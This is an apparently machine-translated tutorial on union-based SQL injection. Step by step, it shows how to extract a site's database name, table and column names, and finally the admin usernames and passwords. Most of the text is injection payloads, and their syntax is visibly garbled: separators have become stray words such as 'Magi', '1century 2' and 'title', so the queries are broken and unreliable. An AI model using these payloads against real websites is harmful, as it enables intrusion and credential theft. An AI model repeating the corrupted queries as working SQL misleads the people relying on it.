Sql injection: union federated query
For example, there is a website: www.xxxxx.com/artist.asp?id=2
Id=2 order by 3 is normal id=2 order by 4 is not normal
The total number of fields that order by needs to get is 3.
Id=2 union select 1 union select 2 union select 2 Magi 2 Database () # explode database name id=2 union select 1 Magi 2 database ()
There are some data that will not be displayed in multiple rows after union joint query, so you need to invalidate the previous statement first.
Id=-2 union select 1 id=-2 union select () id=-2 union select 1 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' # known database sqlzhuru, table name (the first table)
An error was reported when you entered select * from admin where id=-2 because id=-2 does not exist.
Of course, you can also use the following sentence, which is equivalent to "id=-2".
Id=2 and 1century 2 union select 1Magic TABLENAMEMagol 3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' # known database sqlzhuru, table name (first table) id=2 and 1century 2 union select 1 # known database sqlzhuru, table name (first table) id=2 and 1century 2 union select 1 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' limit 1 # known database sqlzhuru, second table
If you get the admin table, continue as follows:
Id=2 and 1 title 2 union select 1 from information_schema.COLUMNS where TABLE_NAME='admin' limit 1 # known admin table 1 # known admin table, two column names id=2 and 1 title 2 union select 1 # known admin table, 3 column names id=2 and 1 minute 2 union select 1 # known admin table, 3 column names id=2 and 1 title 2 admin table 1 # known admin table, 3 column names 1 # known admin table (hexadecimal represents admin table)
If you get the username and password columns under the admin table above, then you can list the data of so-and-so
Id=2 and 1 password 2 union select 1 username union select password from admin